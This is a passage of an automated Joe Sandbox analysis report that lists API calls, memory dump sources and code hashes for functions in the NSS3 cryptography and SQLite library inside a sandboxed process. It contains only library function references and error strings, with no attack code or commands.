                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                                                                                                                              • Opcode ID: a46c3d0696db6183d5e41701b9fe6a8e8a9ffbae97b2e8602150b845593dd24c
                                                                                                                                                                                                                                              • Instruction ID: 1f1a5307c9f21cb862c941144829ad368ec9387872c38ffff839f4a115e042a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a46c3d0696db6183d5e41701b9fe6a8e8a9ffbae97b2e8602150b845593dd24c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4418DB5A14719CFCB01FF7AD094569BBB0BF06315F054629EC989B710EB30D884CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_DigestInit), ref: 6C346C66
                                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C346C94
                                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C346CA3
                                                                                                                                                                                                                                                • Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C346CB9
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C346CD5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                              • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nBl
                                                                                                                                                                                                                                              • API String ID: 1003633598-3110559346
                                                                                                                                                                                                                                              • Opcode ID: ea9e5ba47ca24309a25b89ff5e0367a295ebbfab66b527f4e8c976388449e39a
                                                                                                                                                                                                                                              • Instruction ID: aaf8fccf8015dfc904caa09d549e09a8f10f265a90eacefb6b11f32683f1a4c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea9e5ba47ca24309a25b89ff5e0367a295ebbfab66b527f4e8c976388449e39a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8021C131A011649BDB11FF559D89F9A37F5EB4622CF048029E909D7A12DF359908CFF2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C35DE64), ref: 6C35ED0C
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C35ED22
                                                                                                                                                                                                                                                • Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095
                                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6C35ED4A
                                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C35ED6B
                                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C35ED38
                                                                                                                                                                                                                                                • Part of subcall function 6C294C70: TlsGetValue.KERNEL32(?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294C97
                                                                                                                                                                                                                                                • Part of subcall function 6C294C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CB0
                                                                                                                                                                                                                                                • Part of subcall function 6C294C70: PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CC9
                                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C35ED52
                                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C35ED83
                                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6C35ED95
                                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C35ED9D
                                                                                                                                                                                                                                                • Part of subcall function 6C3764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C37127C,00000000,00000000,00000000), ref: 6C37650E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                              • Opcode ID: ae47cb344b5f6c6670261ef15e7caf496af1ac64d8e9b77284edd15cc0277482
                                                                                                                                                                                                                                              • Instruction ID: e6fb8a5d40466a364c40762f88522a3deffc196c87188f4fa5f36a3b010c433a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae47cb344b5f6c6670261ef15e7caf496af1ac64d8e9b77284edd15cc0277482
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 741108769003146EEA309625AC54FFB73B8AF0160CF450525EC9466E41FB2DA5289EFB
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6C384DCB
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3187ED,00000800,6C30EF74,00000000), ref: 6C371000
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: PR_NewLock.NSS3(?,00000800,6C30EF74,00000000), ref: 6C371016
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: PL_InitArenaPool.NSS3(00000000,security,6C3187ED,00000008,?,00000800,6C30EF74,00000000), ref: 6C37102B
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C384DE1
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C384DFF
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C384E59
                                                                                                                                                                                                                                                • Part of subcall function 6C36FAB0: free.MOZGLUE(?,-00000001,?,?,6C30F673,00000000,00000000), ref: 6C36FAC7
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C44300C,00000000), ref: 6C384EB8
                                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C384EFF
                                                                                                                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C384F56
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C38521A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1025791883-0
                                                                                                                                                                                                                                              • Opcode ID: 9beea0f9dd30d4960b4878d0d552c2d02fa36d9347a8b66ba2f8bc135e65c87a
                                                                                                                                                                                                                                              • Instruction ID: 0a634aec27b165d740aac27eab5c34610771c736de1462922cacd2f51b31b8be
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9beea0f9dd30d4960b4878d0d552c2d02fa36d9347a8b66ba2f8bc135e65c87a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F1AD71E02209CBEB04CF54D8507ADB7B6FF44358F258169E816ABB80E736E981CF90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __allrem
                                                                                                                                                                                                                                              • String ID: @Bl$PBl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Bl
                                                                                                                                                                                                                                              • API String ID: 2933888876-2286440648
                                                                                                                                                                                                                                              • Opcode ID: 1d4ff387db78f8dbe87a03ff798b4aff973b86d1febfe7f26518cda110d4bc4b
                                                                                                                                                                                                                                              • Instruction ID: 3153f74c89784c8761aac540441659154511a8c29a0b055449de64013967e0fb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d4ff387db78f8dbe87a03ff798b4aff973b86d1febfe7f26518cda110d4bc4b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B61B272B402149FDB04DF68DC88A6A77F1FF49358F108529E9159B790DB32AC06CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C2924EC
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C292315), ref: 6C29254F
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C292315), ref: 6C29256C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C2924F4, 6C292557
                                                                                                                                                                                                                                              • misuse, xrefs: 6C292561
                                                                                                                                                                                                                                              • bind on a busy prepared statement: [%s], xrefs: 6C2924E6
                                                                                                                                                                                                                                              • API called with finalized prepared statement, xrefs: 6C292543, 6C29254D
                                                                                                                                                                                                                                              • API called with NULL prepared statement, xrefs: 6C29253C
                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C292566
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                                                                                                                                              • API String ID: 632333372-2222229625
                                                                                                                                                                                                                                              • Opcode ID: 37b5a6b78f77d61ee955a00a24609f194615db4df2b65d41f303573ee8187176
                                                                                                                                                                                                                                              • Instruction ID: 84b4ab17531b4a64d0b8dae0362f8a1c8eeaeed7cf43e0b063617f7eeb2acb76
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37b5a6b78f77d61ee955a00a24609f194615db4df2b65d41f303573ee8187176
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F4120B1700609CBE714DF1AEC98F6673B6BF81719F24492CEC095BB40DB76E8158B91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C36A4A6
                                                                                                                                                                                                                                                • Part of subcall function 6C370840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C3708B4
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C36A4EC
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C36A527
                                                                                                                                                                                                                                              • memcmp.VCRUNTIME140(00000006,?,?), ref: 6C36A56D
                                                                                                                                                                                                                                              • memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C36A583
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C36A596
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C36A5A4
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C36A5B6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
                                                                                                                                                                                                                                              • String ID: ^j2l
                                                                                                                                                                                                                                              • API String ID: 3906949479-3869413497
                                                                                                                                                                                                                                              • Opcode ID: e9ba618af170a7fe14f45074c32f1b07efd34fec2159845a6bd15d0fabe3f2e2
                                                                                                                                                                                                                                              • Instruction ID: bf2b274a39cf066aaf1637f2456e4bcf036dd1ec632c14e8dd757103a501fb23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9ba618af170a7fe14f45074c32f1b07efd34fec2159845a6bd15d0fabe3f2e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73410931A002519FDB10DF5ACC40B9ABBB5AF40308F148458DA995BF46E731E919CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6C317D8F,6C317D8F,?,?), ref: 6C316DC8
                                                                                                                                                                                                                                                • Part of subcall function 6C36FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C36FE08
                                                                                                                                                                                                                                                • Part of subcall function 6C36FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C36FE1D
                                                                                                                                                                                                                                                • Part of subcall function 6C36FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C36FE62
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C317D8F,?,?), ref: 6C316DD5
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C438FA0,00000000,?,?,?,?,6C317D8F,?,?), ref: 6C316DF7
                                                                                                                                                                                                                                                • Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095
                                                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C316E35
                                                                                                                                                                                                                                                • Part of subcall function 6C36FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C36FE29
                                                                                                                                                                                                                                                • Part of subcall function 6C36FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C36FE3D
                                                                                                                                                                                                                                                • Part of subcall function 6C36FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C36FE6F
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C316E4C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37116E
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C438FE0,00000000), ref: 6C316E82
                                                                                                                                                                                                                                                • Part of subcall function 6C316AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C31B21D,00000000,00000000,6C31B219,?,6C316BFB,00000000,?,00000000,00000000,?,?,?,6C31B21D), ref: 6C316B01
                                                                                                                                                                                                                                                • Part of subcall function 6C316AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C316B8A
                                                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C316F1E
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C316F35
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C438FE0,00000000), ref: 6C316F6B
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6C317D8F,?,?), ref: 6C316FE1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 587344769-0
                                                                                                                                                                                                                                              • Opcode ID: c5ef1cb5ea6e1a282bff72af4f98fb3ff47d2d81aae5fc2f4cb6823dcf3e81c1
                                                                                                                                                                                                                                              • Instruction ID: 4ac74e0fa6b4a3ccb6881a052499b6fc8e96d67e38ff32fe88a4a2d9b5c4f095
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5ef1cb5ea6e1a282bff72af4f98fb3ff47d2d81aae5fc2f4cb6823dcf3e81c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8719C71D142469FEB04CF55CD40BAABBB8FF94348F154229E848DBA11E731EA94CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C33AB7F,?,00000000,?), ref: 6C334CB4
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6C33AB7F,?,00000000,?), ref: 6C334CC8
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6C33AB7F,?,00000000,?), ref: 6C334CE0
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6C33AB7F,?,00000000,?), ref: 6C334CF4
                                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6C33AB7F,?,00000000,?), ref: 6C334D03
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6C334D10
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4
                                                                                                                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6C334D26
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DC6
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DD1
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D9DED
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C334D98
